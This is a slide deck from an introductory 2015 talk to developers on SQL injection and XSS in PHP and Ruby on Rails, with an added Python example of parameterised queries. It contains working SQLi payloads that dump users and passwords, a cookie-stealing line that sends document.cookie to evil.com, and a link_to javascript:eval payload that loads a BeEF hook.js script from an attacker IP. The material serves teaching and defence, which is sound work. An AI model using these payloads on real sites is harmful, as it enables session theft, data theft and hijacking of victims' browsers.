Don’t Do what Derpy The Dreadful Dev Does

(also - don’t let “friends” on IRC decide on your talk title)

Secure Development Melbourne, 11/06/2015

whoami

• @liamosaur

• Penetration Tester / Consultant with Assurance

• Previously: C# / Java developer

The Brief

• Basic, introductory level talk about security

• Establish some common ground between the Infosec and Dev world

Topics

• Popular vulnerabilities (hopefully a recap)

• Demo some tools by exploiting some vulns

OWASP Top 5/10

1. Injection (SQLi, Command injection, XXE, LDAPi etc)

2. Broken Auth / Session Management

3. Cross-Site Scripting (XSS)

4. Insecure Direct Object References

5. Security Misconfiguration

SQLi basics

• Inject user controlled content into dynamic SQL queries, allowing unintended access/control of database

SQLi basics

• PHP: $query = "SELECT username FROM users WHERE username='".$_POST['username']."'";

• Input: liamo

• SQL: SELECT username FROM users WHERE username='liamo'

• Query result: liamo

SQLi basics

• PHP: $query = "SELECT username FROM users WHERE username='".$_POST['username']."'";

• Input: ' OR 'a'='a

• SQL: SELECT username FROM users WHERE username='' OR 'a'='a'

• Query result: list of all users

SQLi basics

• PHP: $query = "SELECT username FROM users WHERE username='".$_POST['username']."'";

• Input: liamo' UNION SELECT password FROM users WHERE username='admin

• SQL: SELECT username FROM users WHERE username='liamo' UNION SELECT password FROM users WHERE username='admin'

• Query result: liamo and the admin password
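To make the three SQLi slides concrete from the defender's side, here is an added example (not from the deck) that runs the same three inputs through a concatenated query and through a parameterised one. It uses Python's sqlite3 rather than the deck's PHP; the users table and its rows are constructed sample data.

```python
import sqlite3


# Constructed sample database standing in for the deck's "users" table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("liamo", "hunter2"), ("admin", "s3cret"), ("bob", "pw")])
    return db


def lookup_vulnerable(db, username):
    # Same mistake as the deck's PHP: the input is spliced into the SQL text,
    # so a quote in the input closes the string literal and the remainder is
    # parsed as SQL.
    query = "SELECT username FROM users WHERE username='" + username + "'"
    return [row[0] for row in db.execute(query)]


def lookup_safe(db, username):
    # Parameterised query: the SQL text is fixed and the value travels
    # separately, so the input is only ever compared as data, never parsed.
    cur = db.execute("SELECT username FROM users WHERE username=?", (username,))
    return [row[0] for row in cur]


# The three inputs from the slides.
INPUTS = [
    "liamo",
    "' OR 'a'='a",
    "liamo' UNION SELECT password FROM users WHERE username='admin",
]

if __name__ == "__main__":
    db = make_db()
    for user_input in INPUTS:
        print(repr(user_input))
        print("  concatenated :", lookup_vulnerable(db, user_input))
        print("  parameterised:", lookup_safe(db, user_input))
```

The concatenated version returns every user for the second input and leaks the admin password for the third; the parameterised version returns nothing for either, because no username literally equals those strings.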

Cross-Site Scripting (XSS)

• Inject user controlled content into dynamic web content, allowing unintended access/control within a target browser

XSS Basics

• HTML: <html><body>Hello, <?php echo $_REQUEST['name']; ?>!</body></html>

• Input: Liam

• Output: Hello, Liam!

XSS Basics

• HTML: <html><body>Hello, <?php echo $_REQUEST['name']; ?>!</body></html>

• Input: Liam<script>alert(1)</script>

• Output: Hello, Liam<script>alert(1)</script>! (the browser executes the injected script and shows an alert box)

XSS - Who cares?

• Old school - cookie stealing

• http://evil.com/cookies.php? + escape(document.cookie)

• Steal session ID - game over

• Less effective thanks to httpOnly cookie flag

“Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails now”

PHP Demo!

Rails

• Problem #1 - I don’t know Rails

• Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)

Rails

• Learned Rails. Wrote a basic app

• Problem #2: Rails has ActiveRecord magic beans that prevent SQLi

Rails

• Solution: Uhh.. maybe I’ll just demo XSS instead!

Rails

• Problem #3: Rails has input/output escaping magic beans that prevent XSS

• Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire

Rubby Demo!

Presenting: Rubby

Presenting: Rubby

• Bad code

• Better code

Exploiting Rubby

Rubby XSS

• “link_to” is vulnerable to XSS out of the box if it displays user controlled content

Rubby XSS

• Challenge for those playing at home: come up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x(){var a = document.createElement('script');a.setAttribute('src','http://192.168.57.159:3000/hook.js');document.head.appendChild(a);};x();");

BeEF Tunnelling Proxy (diagram)

• Attacker's browser -> BeEF server (HTTP proxy) -> victim's browser (XHR proxy) -> target server (same domain as the XSS phish); the victim is phished with XSS to load hook.js

Frameworks/Languages

• PHP

  • Bad: No built in security

• Ruby on Rails

  • Good: Built in security

Frameworks/Languages

• PHP

  • Good: PHP devs know they need to take security into account

• Ruby on Rails

  • Bad: “The framework takes care of security for me!”

Conclusions

• Security is everyone’s responsibility

• Your framework’s magic beans won’t save you

Questions - save for the Q&A Panel!

References

• https://www.owasp.org/index.php/Top_10_2013-Top_10

• http://rails-sqli.org/

• https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet

• https://github.com/beefproject/beef/wiki/Tunneling

• http://sqlmap.org/